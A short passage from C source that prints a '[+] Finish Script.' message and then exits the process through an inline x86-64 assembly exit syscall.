    printf("\e[0;36m[+] Finish Script.\n");
    __asm__ volatile
        ("mov $0x3C, %%rax\n\t"
            "mov $0x0, %%rdi\n\t"
            "syscall\n\t"
            :
            :
            :"rax", "rdi"
            );
}